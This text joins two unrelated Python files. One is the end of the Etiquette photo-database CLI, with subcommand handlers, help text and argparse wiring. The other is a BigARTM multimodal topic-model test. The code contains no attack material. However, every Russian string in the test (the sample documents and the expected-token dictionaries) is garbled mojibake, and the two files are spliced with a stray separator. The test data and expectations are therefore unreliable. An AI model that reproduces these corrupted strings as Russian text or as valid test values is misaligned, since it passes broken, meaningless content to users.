exclude_filenames=args.exclude_filenames,
glob_directories=args.glob_directories,
glob_filenames=args.glob_filenames,
hash_kwargs={'bytes_per_second': args.hash_bytes_per_second},
make_albums=args.make_albums,
new_photo_ratelimit=args.ratelimit,
recurse=args.recurse,
yield_albums=True,
yield_photos=True,
)
for result in digest:
# print(result)
need_commit = True
if not need_commit:
return 0
if args.autoyes or interactive.getpermission('Commit?'):
photodb.commit()
return 0
def easybake_argparse(args):
photodb = etiquette.photodb.PhotoDB.closest_photodb()
for eb_string in args.eb_strings:
notes = photodb.easybake(eb_string)
for (action, tagname) in notes:
print(action, tagname)
if args.autoyes or interactive.getpermission('Commit?'):
photodb.commit()
return 0
def export_symlinks_argparse(args):
destination = pathclass.Path(args.destination)
destination.makedirs(exist_ok=True)
total_paths = set()
if args.album_id_args or args.album_search_args:
albums = get_albums_from_args(args)
export = export_symlinks_albums(
albums,
destination,
dry_run=args.dry_run,
)
total_paths.update(export)
if args.photo_id_args or args.photo_search_args:
photos = get_photos_from_args(args)
export = export_symlinks_photos(
photos,
destination,
dry_run=args.dry_run,
)
total_paths.update(export)
if not args.prune or args.dry_run:
return 0
symlinks = spinal.walk(destination, yield_directories=True, yield_files=True)
symlinks = set(path for path in symlinks if path.is_link)
symlinks = symlinks.difference(total_paths)
for old_symlink in symlinks:
print(f'Pruning {old_symlink}.')
os.remove(old_symlink)
if not old_symlink.parent.listdir():
os.rmdir(old_symlink.parent)
checkdirs = set(spinal.walk(destination, yield_directories=True, yield_files=False))
while checkdirs:
check = checkdirs.pop()
if check not in destination:
continue
if len(check.listdir()) == 0:
os.rmdir(check)
checkdirs.add(check.parent)
return 0
def generate_thumbnail_argparse(args):
photodb = etiquette.photodb.PhotoDB.closest_photodb()
if args.photo_id_args or args.photo_search_args:
photos = get_photos_from_args(args)
else:
photos = search_in_cwd(yield_photos=True, yield_albums=False)
need_commit = False
try:
for photo in photos:
photo.generate_thumbnail()
need_commit = True
except KeyboardInterrupt:
pass
if not need_commit:
return 0
if args.autoyes or interactive.getpermission('Commit?'):
photodb.commit()
return 0
def init_argparse(args):
photodb = etiquette.photodb.PhotoDB(create=True)
photodb.commit()
return 0
def purge_deleted_files_argparse(args):
photodb = etiquette.photodb.PhotoDB.closest_photodb()
if args.photo_id_args or args.photo_search_args:
photos = get_photos_from_args(args)
else:
photos = search_in_cwd(yield_photos=True, yield_albums=False)
need_commit = False
for deleted in photodb.purge_deleted_files(photos):
need_commit = True
print(deleted)
if not need_commit:
return 0
if args.autoyes or interactive.getpermission('Commit?'):
photodb.commit()
return 0
def purge_empty_albums_argparse(args):
photodb = etiquette.photodb.PhotoDB.closest_photodb()
# We do not check args.album_search_args because currently it is not
# possible for search results to find empty albums on account of the fact
# that albums are only yielded when they contain some result photo.
if args.album_id_args:
albums = get_albums_from_args(args)
else:
albums = photodb.get_albums_within_directory(pathclass.cwd())
need_commit = False
for deleted in photodb.purge_empty_albums(albums):
need_commit = True
print(deleted)
if not need_commit:
return 0
if args.autoyes or interactive.getpermission('Commit?'):
photodb.commit()
return 0
def reload_metadata_argparse(args):
photodb = etiquette.photodb.PhotoDB.closest_photodb()
if args.photo_id_args or args.photo_search_args:
photos = get_photos_from_args(args)
else:
photos = search_in_cwd(yield_photos=True, yield_albums=False)
hash_kwargs = {
'bytes_per_second': args.hash_bytes_per_second,
'callback_progress': spinal.callback_progress_v1,
}
need_commit = False
try:
for photo in photos:
if not photo.real_path.is_file:
continue
need_reload = (
args.force or
photo.mtime != photo.real_path.stat.st_mtime or
photo.bytes != photo.real_path.stat.st_size
)
if not need_reload:
continue
photo.reload_metadata(hash_kwargs=hash_kwargs)
need_commit = True
except KeyboardInterrupt:
pass
if not need_commit:
return 0
if args.autoyes or interactive.getpermission('Commit?'):
photodb.commit()
return 0
def relocate_argparse(args):
photodb = etiquette.photodb.PhotoDB.closest_photodb()
photo = photodb.get_photo(args.photo_id)
photo.relocate(args.filepath)
if args.autoyes or interactive.getpermission('Commit?'):
photodb.commit()
return 0
def search_argparse(args):
photos = search_by_argparse(args, yield_photos=True)
for photo in photos:
print(photo.real_path.absolute_path)
return 0
def show_associated_directories_argparse(args):
if args.album_id_args or args.album_search_args:
albums = get_albums_from_args(args)
else:
albums = search_in_cwd(yield_photos=False, yield_albums=True)
for album in albums:
directories = album.get_associated_directories()
if not directories:
continue
directories = [f'"{d.absolute_path}"' for d in directories]
directories = ' '.join(directories)
print(f'{album} | {directories}')
return 0
def set_unset_searchhidden_argparse(args, searchhidden):
photodb = etiquette.photodb.PhotoDB.closest_photodb()
if args.photo_search_args:
args.photo_search_args.is_searchhidden = not searchhidden
if args.album_search_args:
args.album_search_args.is_searchhidden = not searchhidden
if args.any_id_args:
photos = get_photos_from_args(args)
albums = get_albums_from_args(args)
photos.extend(photo for album in albums for photo in album.walk_photos())
else:
photos = search_in_cwd(yield_photos=True, yield_albums=False)
for photo in photos:
print(photo)
photo.set_searchhidden(searchhidden)
if args.autoyes or interactive.getpermission('Commit?'):
photodb.commit()
return 0
def tag_breplace_argparse(args):
photodb = etiquette.photodb.PhotoDB.closest_photodb()
renames = []
tag_names = photodb.get_all_tag_names()
all_names = tag_names.union(photodb.get_all_synonyms())
for tag_name in tag_names:
if args.regex:
new_name = re.sub(args.replace_from, args.replace_to, tag_name)
else:
new_name = tag_name.replace(args.replace_from, args.replace_to)
new_name = photodb.normalize_tagname(new_name)
if new_name == tag_name:
continue
if new_name in all_names:
raise etiquette.exceptions.TagExists(new_name)
if args.set_synonym:
printline = f'{tag_name} -> {new_name}+{tag_name}'
else:
printline = f'{tag_name} -> {new_name}'
renames.append((tag_name, new_name, printline))
if not args.autoyes:
for (tag_name, new_name, printline) in renames:
print(printline)
if not interactive.getpermission('Ok?', must_pick=True):
return 0
for (tag_name, new_name, printline) in renames:
print(printline)
tag = photodb.get_tag(tag_name)
tag.rename(new_name)
if args.set_synonym:
tag.add_synonym(tag_name)
if args.autoyes or interactive.getpermission('Commit?'):
photodb.commit()
return 0
def tag_list_argparse(args):
photodb = etiquette.photodb.PhotoDB.closest_photodb()
tags = photodb.get_all_tag_names()
synonyms = photodb.get_all_synonyms()
keys = sorted(tags.union(synonyms.keys()))
for key in keys:
if key in synonyms:
print(f'{key}={synonyms[key]}')
else:
print(key)
return 0
DOCSTRING = '''
Etiquette CLI
=============
This is the command-line interface for Etiquette, so that you can automate your
database and integrate it into other scripts.
The following commands are available:
{add_tag}
{remove_tag}
{delete}
{digest}
{easybake}
{export_symlinks}
{generate_thumbnail}
{init}
{purge_deleted_files}
{purge_empty_albums}
{reload_metadata}
{relocate}
{search}
{show_associated_directories}
{set_searchhidden}
{unset_searchhidden}
{tag_breplace}
{tag_list}
You can add --yes to avoid the "Commit?" prompt on commands that modify the db.
TO SEE DETAILS ON EACH COMMAND, RUN
> etiquette_cli.py <command> --help
'''
SUB_DOCSTRINGS = dict(
add_tag='''
add_tag:
Add a tag to photos by a filename glob or by search results.
> etiquette_cli.py add_tag tag_name glob_patterns
> etiquette_cli.py add_tag tag_name --search searchargs
Examples:
> etiquette_cli.py add_tag wallpaper wall*.jpg wall*.png
> etiquette_cli.py add_tag author.author_voussoir --search --tag-forbids author
See etiquette_cli.py search --help for more info about searchargs.
''',
remove_tag='''
remove_tag:
Remove a tag from photos by a filename glob or by search results.
> etiquette_cli.py remove_tag tag_name glob_patterns
> etiquette_cli.py remove_tag tag_name --search searchargs
Examples:
> etiquette_cli.py remove_tag watchlist spongebob*.mp4
> etiquette_cli.py remove_tag watchlist --search --tag-musts directed_by_michael_bay
See etiquette_cli.py search --help for more info about searchargs.
''',
delete='''
delete:
Remove photos or albums from the database.
flags:
--delete_file:
Delete the file from disk after committing.
Your config.json file's recycle_instead_of_delete will influence this.
Without this flag, photos are removed from the db but remain on disk.
> etiquette_cli.py delete --photos id id id
> etiquette_cli.py delete --search searchargs
> etiquette_cli.py delete --albums id id id
> etiquette_cli.py delete --album-search searchargs
See etiquette_cli.py search --help for more info about searchargs.
''',
digest='''
digest:
Digest a directory, adding new files as Photos into the database.
> etiquette_cli.py digest directory <flags>
flags:
--exclude_directories A B C:
Any directories matching any pattern of A, B, C... will be skipped.
These patterns may be absolute paths like 'D:\\temp', plain names like
'thumbnails' or glob patterns like 'build_*'.
--exclude_filenames A B C:
Any filenames matching any pattern of A, B, C... will be skipped.
These patterns may be absolute paths like 'D:\\somewhere\\config.json',
plain names like 'thumbs.db' or glob patterns like '*.temp'.
--glob_directories A B C:
Only directories matching any pattern of A, B, C... will be digested.
These patterns may be plain names or glob patterns like '2021*'
--glob_filenames A B C:
Only filenames matching any pattern of A, B, C... will be digested.
These patterns may be plain names or glob patterns like '*.jpg'
--no_albums:
Do not create any albums. By default, albums are created and nested to
match the directory structure.
--ratelimit X:
Limit the ingest of new Photos to only one per X seconds. This can be
used to reduce system load or to make sure that two photos don't get the
same `created` timestamp.
--no_recurse:
Do not recurse into subdirectories. Only create Photos from files in
the current directory.
Examples:
> etiquette_cli.py digest media --ratelimit 1
> etiquette_cli.py digest photos --no-recurse --no-albums --ratelimit 0.25
> etiquette_cli.py digest . --glob-filenames *.jpg --exclude-filenames thumb*
''',
easybake='''
easybake:
Create and manipulate tags by easybake strings.
> etiquette_cli.py easybake eb_string
''',
export_symlinks='''
export_symlinks:
Search for photos or albums, then create symlinks pointing to the results.
THIS IS STILL A BIT EXPERIMENTAL.
This can be used to gather up search results for the purpose of further
uploading, transferring, etc. with other applications.
Symlinks point to files (if result is a photo) or directories (if result is
an album with an associated directory).
Albums are limited to only one associated directory since the output
symlink can't point to two places at once.
> etiquette_cli.py export_symlinks --destination directory --search searchargs
> etiquette_cli.py export_symlinks --destination directory --album-search searchargs
flags:
--destination X:
A path to a directory into which the symlinks will be placed.
--dry:
Print the results without actually creating the symlinks.
--prune:
In the destination directory, any existing symlinks whose target no
longer exists will be deleted.
See etiquette_cli.py search --help for more info about searchargs.
''',
generate_thumbnail='''
generate_thumbnail:
Generate thumbnails for photos.
With no args, all files under the cwd will be thumbnailed.
Or, you can pass specific photo ids or searchargs.
> etiquette_cli.py generate_thumbnail
> etiquette_cli.py generate_thumbnail --photos id id id
> etiquette_cli.py generate_thumbnail --search searchargs
Examples:
> etiquette_cli.py generate_thumbnail --search --has-thumbnail no
See etiquette_cli.py search --help for more info about searchargs.
''',
init='''
init:
Create a new Etiquette database in the current directory.
> etiquette_cli.py init
''',
purge_deleted_files='''
purge_deleted_files:
Delete any Photo objects whose file no longer exists on disk.
> etiquette_cli.py purge_deleted_files
> etiquette_cli.py purge_deleted_files --photos id id id
> etiquette_cli.py purge_deleted_files --search searchargs
See etiquette_cli.py search --help for more info about searchargs.
''',
purge_empty_albums='''
purge_empty_albums:
Delete any albums which have no child albums or photos.
Consider running purge_deleted_files first, so that albums containing
deleted files will get cleared out and then caught by this function.
With no args, all albums will be checked.
Or you can pass specific album ids. (searchargs is not available since
albums only appear in search results when a matching photo is found, and
we're looking for albums with no photos!)
> etiquette_cli.py purge_empty_albums
> etiquette_cli.py purge_empty_albums --albums id id id
''',
reload_metadata='''
reload_metadata:
Reload photos' metadata by reading the files from disk.
With no args, all files under the cwd will be reloaded.
Or, you can pass specific photo ids or searchargs.
> etiquette_cli.py reload_metadata
> etiquette_cli.py reload_metadata --photos id id id
> etiquette_cli.py reload_metadata --search searchargs
flags:
--force:
By default, we will skip any files that have the same mtime and byte
size as before. You can pass --force to always reload.
--hash_bytes_per_second X:
A string like "10mb" to limit the speed of file hashing for the purpose
of reducing system load.
See etiquette_cli.py search --help for more info about searchargs.
''',
relocate='''
relocate:
Change a photo's filepath. Used for updating photos that have been changed
by external tools.
> etiquette_cli.py relocate photo_id filepath
''',
search='''
search:
Search for photos and albums with complex operators.
> etiquette_cli.py search searchargs
> etiquette_cli.py search --album-search searchargs
Searchargs:
--area X-Y:
Photo/video width*height between X and Y.
--width X-Y:
Photo/video width between X and Y.
--height X-Y:
Photo/video height between X and Y.
--ratio X-Y:
Photo/video aspect ratio between X and Y.
--bytes X-Y:
File size in bytes between X and Y.
--duration X-Y:
Media duration between X and Y seconds.
--author X:
Photo authored by user with username X.
--created X-Y:
Photo creation date between X and Y unix timestamp.
--extension A,B,C:
Photo with any extension of A, B, C...
--extension_not A,B,C:
Photo without any extension of A, B, C...
--filename X:
Search terms for Photo's filename.
--has_tags yes/no/null:
If yes, Photo must have at least one tag.
If no, Photo must have no tags.
If null, doesn't matter.
--has_thumbnail yes/no/null:
--is_searchhidden yes/no/null:
--mimetype A,B,C:
Photo with any mimetype of A, B, C...
--sha256 A,B,C:
Photo with any sha256 of A, B, C...
--tag_musts A,B,C:
Photo must have all tags A and B and C...
--tag_mays A,B,C:
Photo must have at least one tag of A, B, C...
--tag_forbids A,B,C:
Photo must not have any tags of A, B, C...
--tag_expression X:
Complex expression string to match tags.
--limit X:
Limit results to first X items.
--offset X:
Skip the first X items.
--orderby X-Y:
Order the results by property X in direction Y. E.g. created-desc or
bytes-asc.
''',
show_associated_directories='''
show_associated_directories:
Show the associated directories for albums.
> etiquette_cli.py show_associated_directories
> etiquette_cli.py show_associated_directories --albums id id id
> etiquette_cli.py show_associated_directories --album-search searchargs
See etiquette_cli.py search --help for more info about searchargs.
''',
set_searchhidden='''
set_searchhidden:
Mark photos as searchhidden.
> etiquette_cli.py set_searchhidden --photos id id id
> etiquette_cli.py set_searchhidden --search searchargs
See etiquette_cli.py search --help for more info about searchargs.
''',
unset_searchhidden='''
unset_searchhidden:
Unmark photos as searchhidden.
> etiquette_cli.py unset_searchhidden --photos id id id
> etiquette_cli.py unset_searchhidden --search searchargs
See etiquette_cli.py search --help for more info about searchargs.
''',
tag_breplace='''
tag_breplace:
For all tags in the database, use find-and-replace to rename the tags.
> etiquette_cli.py tag_breplace replace_from replace_to
''',
tag_list='''
tag_list:
Show all tags in the database.
> etiquette_cli.py tag_list
''',
)
DOCSTRING = betterhelp.add_previews(DOCSTRING, SUB_DOCSTRINGS)
@vlogging.main_decorator
def main(argv):
parser = argparse.ArgumentParser(description=__doc__)
subparsers = parser.add_subparsers()
primary_args = []
photo_id_args = []
photo_search_args = []
album_id_args = []
album_search_args = []
mode = primary_args
for arg in argv:
if 0:
pass
elif arg in {'--search', '--photo_search', '--photo-search'}:
mode = photo_search_args
elif arg in {'--album_search', '--album-search'}:
mode = album_search_args
elif arg == '--photos':
mode = photo_id_args
elif arg == '--albums':
mode = album_id_args
else:
mode.append(arg)
p_add_tag = subparsers.add_parser('add_tag', aliases=['add-tag'])
p_add_tag.add_argument('tag_name')
p_add_tag.add_argument('globs', nargs='*')
p_add_tag.add_argument('--yes', dest='autoyes', action='store_true')
p_add_tag.set_defaults(func=lambda args: add_remove_tag_argparse(args, action='add'))
p_remove_tag = subparsers.add_parser('remove_tag', aliases=['remove-tag'])
p_remove_tag.add_argument('tag_name')
p_remove_tag.add_argument('globs', nargs='*')
p_remove_tag.add_argument('--yes', dest='autoyes', action='store_true')
p_remove_tag.set_defaults(func=lambda args: add_remove_tag_argparse(args, action='remove'))
p_delete = subparsers.add_parser('delete')
p_delete.add_argument('--delete_file', '--delete-file', action='store_true')
p_delete.add_argument('--yes', dest='autoyes', action='store_true')
p_delete.set_defaults(func=delete_argparse)
p_digest = subparsers.add_parser('digest', aliases=['digest_directory', 'digest-directory'])
p_digest.add_argument('directory')
p_digest.add_argument('--exclude_directories', '--exclude-directories', nargs='+', default=None)
p_digest.add_argument('--exclude_filenames', '--exclude-filenames', nargs='+', default=None)
p_digest.add_argument('--glob_directories', '--glob-directories', nargs='+', default=None)
p_digest.add_argument('--glob_filenames', '--glob-filenames', nargs='+', default=None)
p_digest.add_argument('--no_albums', '--no-albums', dest='make_albums', action='store_false', default=True)
p_digest.add_argument('--ratelimit', dest='ratelimit', type=float, default=0.2)
p_digest.add_argument('--no_recurse', '--no-recurse', dest='recurse', action='store_false', default=True)
p_digest.add_argument('--hash_bytes_per_second', '--hash-bytes-per-second', default=None)
p_digest.add_argument('--yes', dest='autoyes', action='store_true')
p_digest.set_defaults(func=digest_directory_argparse)
p_easybake = subparsers.add_parser('easybake')
p_easybake.add_argument('eb_strings', nargs='+')
p_easybake.add_argument('--yes', dest='autoyes', action='store_true')
p_easybake.set_defaults(func=easybake_argparse)
p_export_symlinks = subparsers.add_parser('export_symlinks', aliases=['export-symlinks'])
p_export_symlinks.add_argument('--destination', dest='destination', required=True)
p_export_symlinks.add_argument('--dry', dest='dry_run', action='store_true')
p_export_symlinks.add_argument('--prune', dest='prune', action='store_true')
p_export_symlinks.set_defaults(func=export_symlinks_argparse)
p_generate_thumbnail = subparsers.add_parser('generate_thumbnail', aliases=['generate-thumbnail'])
p_generate_thumbnail.add_argument('--yes', dest='autoyes', action='store_true')
p_generate_thumbnail.set_defaults(func=generate_thumbnail_argparse)
p_init = subparsers.add_parser('init', aliases=['create'])
p_init.set_defaults(func=init_argparse)
p_purge_deleted_files = subparsers.add_parser('purge_deleted_files', aliases=['purge-deleted-files'])
p_purge_deleted_files.add_argument('--yes', dest='autoyes', action='store_true')
p_purge_deleted_files.set_defaults(func=purge_deleted_files_argparse)
p_purge_empty_albums = subparsers.add_parser('purge_empty_albums', aliases=['purge-empty-albums'])
p_purge_empty_albums.add_argument('--yes', dest='autoyes', action='store_true')
p_purge_empty_albums.set_defaults(func=purge_empty_albums_argparse)
p_reload_metadata = subparsers.add_parser('reload_metadata', aliases=['reload-metadata'])
p_reload_metadata.add_argument('--hash_bytes_per_second', '--hash-bytes-per-second', default=None)
p_reload_metadata.add_argument('--force', action='store_true')
p_reload_metadata.add_argument('--yes', dest='autoyes', action='store_true')
p_reload_metadata.set_defaults(func=reload_metadata_argparse)
p_relocate = subparsers.add_parser('relocate')
p_relocate.add_argument('photo_id')
p_relocate.add_argument('filepath')
p_relocate.add_argument('--yes', dest='autoyes', action='store_true')
p_relocate.set_defaults(func=relocate_argparse)
p_search = subparsers.add_parser('search')
p_search.add_argument('--area', dest='area', default=None)
p_search.add_argument('--width', dest='width', default=None)
p_search.add_argument('--height', dest='height', default=None)
p_search.add_argument('--ratio', dest='ratio', default=None)
p_search.add_argument('--bytes', dest='bytes', default=None)
p_search.add_argument('--duration', dest='duration', default=None)
p_search.add_argument('--author', dest='author', default=None)
p_search.add_argument('--created', dest='created', default=None)
p_search.add_argument('--extension', dest='extension', default=None)
p_search.add_argument('--extension_not', '--extension-not', dest='extension_not', default=None)
p_search.add_argument('--filename', dest='filename', default=None)
p_search.add_argument('--has_tags', '--has-tags', dest='has_tags', default=None)
p_search.add_argument('--has_thumbnail', '--has-thumbnail', dest='has_thumbnail', default=None)
p_search.add_argument('--is_searchhidden', '--is-searchhidden', dest='is_searchhidden', default=False)
p_search.add_argument('--sha256', default=None)
p_search.add_argument('--mimetype', dest='mimetype', default=None)
p_search.add_argument('--tag_musts', '--tag-musts', dest='tag_musts', default=None)
p_search.add_argument('--tag_mays', '--tag-mays', dest='tag_mays', default=None)
p_search.add_argument('--tag_forbids', '--tag-forbids', dest='tag_forbids', default=None)
p_search.add_argument('--tag_expression', '--tag-expression', dest='tag_expression', default=None)
p_search.add_argument('--limit', dest='limit', default=None)
p_search.add_argument('--offset', dest='offset', default=None)
p_search.add_argument('--orderby', dest='orderby', default='basename-ASC')
# p_search.add_argument('--yield_albums', '--yield-albums', dest='yield_albums', default=None)
p_search.set_defaults(func=search_argparse)
p_show_associated_directories = subparsers.add_parser('show_associated_directories', aliases=['show-associated-directories'])
p_show_associated_directories.set_defaults(func=show_associated_directories_argparse)
p_set_searchhidden = subparsers.add_parser('set_searchhidden', aliases=['set-searchhidden'])
p_set_searchhidden.add_argument('--yes', dest='autoyes', action='store_true')
p_set_searchhidden.set_defaults(func=lambda args: set_unset_searchhidden_argparse(args, searchhidden=True))
p_unset_searchhidden = subparsers.add_parser('unset_searchhidden', aliases=['unset-searchhidden'])
p_unset_searchhidden.add_argument('--yes', dest='autoyes', action='store_true')
p_unset_searchhidden.set_defaults(func=lambda args: set_unset_searchhidden_argparse(args, searchhidden=False))
p_tag_breplace = subparsers.add_parser('tag_breplace', aliases=['tag-breplace'])
p_tag_breplace.add_argument('replace_from')
p_tag_breplace.add_argument('replace_to')
p_tag_breplace.add_argument('--set_synonym', '--set-synonym', dest='set_synonym', action='store_true')
p_tag_breplace.add_argument('--regex', dest='regex', action='store_true')
p_tag_breplace.add_argument('--yes', dest='autoyes', action='store_true')
p_tag_breplace.set_defaults(func=tag_breplace_argparse)
p_tag_list = subparsers.add_parser('tag_list', aliases=['tag-list'])
p_tag_list.set_defaults(func=tag_list_argparse)
##
def postprocessor(args):
args.photo_search_args = p_search.parse_args(photo_search_args) if photo_search_args else None
args.album_search_args = p_search.parse_args(album_search_args) if album_search_args else None
args.photo_id_args = [id for arg in photo_id_args for id in stringtools.comma_space_split(arg)]
args.album_id_args = [id for arg in album_id_args for id in stringtools.comma_space_split(arg)]
args.any_id_args = bool(
args.photo_search_args or
args.album_search_args or
args.photo_id_args or
args.album_id_args
)
return args
try:
return betterhelp.subparser_main(
primary_args,
parser,
main_docstring=DOCSTRING,
sub_docstrings=SUB_DOCSTRINGS,
args_postprocessor=postprocessor,
)
except etiquette.exceptions.NoClosestPhotoDB as exc:
pipeable.stderr(exc.error_message)
pipeable.stderr('Try `etiquette_cli.py init` to create the database.')
return 1
if __name__ == '__main__':
raise SystemExit(main(sys.argv[1:]))
|
# -*- coding: utf-8 -*-
# Copyright 2017, Additive Regularization of Topic Models.
from __future__ import print_function
import os
import uuid
import string
import itertools
import tempfile
import shutil
import pytest
from six.moves import range, zip
import artm.wrapper
import artm.wrapper.messages_pb2 as messages
import artm.master_component as mc
def _print_top_tokens(top_tokens_score, expected_values_topic, tolerance):
top_tokens_triplets = zip(top_tokens_score.topic_index,
zip(top_tokens_score.token,
top_tokens_score.weight))
for topic_index, group in itertools.groupby(top_tokens_triplets, key=lambda triplet: triplet[0]):
print_string = u'Topic#{0} : '.format(topic_index)
for _, (token, weight) in group:
print_string += u' {0}({1:.3f})'.format(token, weight)
assert abs(expected_values_topic[topic_index][token] - weight) < tolerance
print(print_string)
def test_func():
# Set some constants
dictionary_name = 'dictionary'
pwt = 'pwt'
nwt = 'nwt'
num_topics = 2
num_document_passes = 10
num_outer_iterations = 10
russian_class_weight = 1.0
english_class_weight = 1.0
russian_class = '@russian'
english_class = '@english'
tolerance = 0.001
expected_values_rus_topic = {
0: {
u'Π΄ΠΎΠΊΡΠΌΠ΅Π½Ρ': 0.125,
u'ΡΠ΅ΠΊΡΡ': 0.125,
u'Π°Π½Π°Π»ΠΈΠ·': 0.125,
u'ΡΡΠ°ΡΠΈΡΡΠΈΡΠ΅ΡΠΊΠΈΠΉ': 0.125,
u'ΠΌΠΎΠ΄Π΅Π»Ρ': 0.125,
u'ΠΊΠΎΠ»Π»Π΅ΠΊΡΠΈΡ': 0.083,
u'ΡΠ΅ΠΌΠ°ΡΠΈΡΠ΅ΡΠΊΠ°Ρ': 0.083,
'model': 0.042,
'topic': 0.042,
'artm': 0.042
},
1: {
u'Π½ΠΎΠ³ΠΈΠ΅': 0.115,
u'ΠΎΡΡΡΠ΄': 0.115,
u'ΠΌΠ»Π΅ΠΊΠΎΠΏΠΈΡΠ°ΡΡΠΈΠ΅': 0.115,
u'ΡΠ΅ΠΌΠ΅ΠΉΡΡΠ²ΠΎ': 0.115,
u'Ρ ΠΈΡΠ½ΡΠΉ': 0.077,
u'Π»Π°ΡΡΠΎ': 0.077,
u'ΠΌΠΎΡΠΆΠΎΠ²ΡΡ ': 0.077,
u'ΡΡΠ»Π΅Π½Ρ': 0.077,
u'ΡΡΠ°ΡΡΡΠΉ': 0.077,
u'ΠΊΠΎΡΠΎΡΠΊΠΎ': 0.038
}
}
expected_values_eng_topic = {
0: {
'model': 0.167,
'text': 0.125,
'analysis': 0.125,
'statistical': 0.125,
'topic': 0.125,
'artm': 0.083,
'plsa': 0.083,
'lda': 0.083,
'collection': 0.083,
'not': 0.000
},
1: {
'mammal': 0.188,
'predatory': 0.125,
'eared': 0.125,
'marine': 0.125,
'seal': 0.125,
'not': 0.062,
'reptile': 0.062,
'crocodilia': 0.062,
'order': 0.062,
'pinnipeds': 0.062
}
}
expected_sparsity_values = {'russian': 0.5, 'english': 0.5}
# Prepare multimodal data
ens = []
rus = []
ens.append(u'Topic model statistical analysis text collection LDA PLSA ARTM')
rus.append(u'Π’Π΅ΠΌΠ°ΡΠΈΡΠ΅ΡΠΊΠ°Ρ ΠΌΠΎΠ΄Π΅Π»Ρ ΡΡΠ°ΡΠΈΡΡΠΈΡΠ΅ΡΠΊΠΈΠΉ Π°Π½Π°Π»ΠΈΠ· ΡΠ΅ΠΊΡΡ ΠΊΠΎΠ»Π»Π΅ΠΊΡΠΈΡ')
ens.append(u'LDA statistical topic model text collection')
rus.append(u'LDA ΡΡΠ°ΡΠΈΡΡΠΈΡΠ΅ΡΠΊΠΈΠΉ ΡΠ΅ΠΌΠ°ΡΠΈΡΠ΅ΡΠΊΠ°Ρ ΠΌΠΎΠ΄Π΅Π»Ρ ΡΠ΅ΠΊΡΡ Π΄ΠΎΠΊΡΠΌΠ΅Π½Ρ ΠΊΠΎΠ»Π»Π΅ΠΊΡΠΈΡ')
ens.append(u'PLSA statistical analysis text model')
rus.append(u'PLSA ΡΡΠ°ΡΠΈΡΡΠΈΡΠ΅ΡΠΊΠΈΠΉ Π°Π½Π°Π»ΠΈΠ· Π΄ΠΎΠΊΡΠΌΠ΅Π½Ρ ΡΠ΅ΠΊΡΡ ΠΌΠΎΠ΄Π΅Π»Ρ')
ens.append(u'ARTM analysis topic model')
rus.append(u'ARTM Π°Π½Π°Π»ΠΈΠ· Π΄ΠΎΠΊΡΠΌΠ΅Π½Ρ topic model')
ens.append(u'Pinnipeds seal marine mammal order')
rus.append(u'Π’ΡΠ»Π΅Π½Ρ ΡΠ΅ΠΌΠ΅ΠΉΡΡΠ²ΠΎ ΠΌΠ»Π΅ΠΊΠΎΠΏΠΈΡΠ°ΡΡΠΈΠ΅ ΠΌΠΎΡΠΆΠΎΠ²ΡΡ  ΠΎΡΡΡΠ΄ Π»Π°ΡΡΠΎ Π½ΠΎΠ³ΠΈΠ΅')
ens.append(u'Eared seal marine predatory mammal')
rus.append(u'Π£ΡΠ°ΡΡΡΠΉ ΡΡΠ»Π΅Π½Ρ ΡΠ΅ΠΌΠ΅ΠΉΡΡΠ²ΠΎ ΠΌΠ»Π΅ΠΊΠΎΠΏΠΈΡΠ°ΡΡΠΈΠ΅ ΠΎΡΡΡΠ΄ Ρ ΠΈΡΠ½ΡΠΉ ΡΠ΅ΠΌΠ΅ΠΉΡΡΠ²ΠΎ ΠΌΠΎΡΠΆΠΎΠ²ΡΡ  Π»Π°ΡΡΠΎ Π½ΠΎΠ³ΠΈΠ΅')
ens.append(u'Eared Crocodilia predatory reptile not mammal')
rus.append(u'Π£ΡΠ°ΡΡΡΠΉ ΠΊΡΠΎΠΊΠΎΠ΄ΠΈΠ» Π³Π΅Π½Π° ΠΎΡΡΡΠ΄ Ρ ΠΈΡΠ½ΡΠΉ Π½Π΅ ΠΌΠ»Π΅ΠΊΠΎΠΏΠΈΡΠ°ΡΡΠΈΠ΅ ΠΊΠΎΡΠΎΡΠΊΠΎ Π½ΠΎΠ³ΠΈΠ΅')
ru_dic = {} # mapping from russian token to its index in batch.token list
en_dic = {} # mapping from english token to its index in batch.token list
batch = messages.Batch() # batch representing the entire collection
batch.id = str(uuid.uuid1())
dict_data = messages.DictionaryData() # BigARTM dictionary to initialize model
dict_data.name = dictionary_name
def append(tokens, dic, item, class_id):
for token in tokens:
if token not in dic: # New token discovered:
dic[token] = len(batch.token) # 1. update ru_dic or en_dic
batch.token.append(token) # 2. update batch.token and batch.class_id
batch.class_id.append(class_id)
dict_data.token.append(token)
dict_data.class_id.append(class_id)
# Add token to the item.
item.token_id.append(dic[token])
# replace '1' with the actual number of token occupancies in the item
item.token_weight.append(1)
# Iterate through all items and populate the batch
for (en, ru) in zip(ens, rus):
next_item = batch.item.add()
next_item.id = len(batch.item) - 1
append(ru.lower().split(), ru_dic, next_item, russian_class)
append(en.lower().split(), en_dic, next_item, english_class)
batches_folder = tempfile.mkdtemp()
try:
# Create the instance of low-level API and master object
lib = artm.wrapper.LibArtm()
# Save batch and dictionary on the disk
lib.ArtmSaveBatch(batches_folder, batch)
# Create master component and scores
scores = {'SparsityPhiRus': messages.SparsityPhiScoreConfig(class_id=russian_class),
'SparsityPhiEng': messages.SparsityPhiScoreConfig(class_id=english_class),
'TopTokensRus': messages.TopTokensScoreConfig(class_id=russian_class),
'TopTokensEng': messages.TopTokensScoreConfig(class_id=english_class)}
master = mc.MasterComponent(lib, scores=scores)
# Create the collection dictionary
lib.ArtmCreateDictionary(master.master_id, dict_data)
# Initialize model
master.initialize_model(model_name=pwt,
topic_names=['topic_{}'.format(i) for i in range(num_topics)],
dictionary_name=dictionary_name)
for iter in range(num_outer_iterations):
# Invoke one scan of the collection, regularize and normalize Phi
master.clear_score_cache()
master.process_batches(pwt, nwt, num_document_passes, batches_folder,
class_ids=[russian_class, english_class],
class_weights=[russian_class_weight, english_class_weight])
master.normalize_model(pwt, nwt)
# Retrieve and print scores
top_tokens_rus = master.get_score('TopTokensRus')
top_tokens_eng = master.get_score('TopTokensEng')
sp_phi_rus = master.get_score('SparsityPhiRus')
sp_phi_eng = master.get_score('SparsityPhiEng')
print('Top tokens per russian topic:')
_print_top_tokens(top_tokens_rus, expected_values_rus_topic, tolerance)
print('Top tokens per english topic:')
_print_top_tokens(top_tokens_eng, expected_values_eng_topic, tolerance)
print('\nSparsity Phi: russian {0:.3f}, english {1:.3f}'.format(sp_phi_rus.value, sp_phi_eng.value))
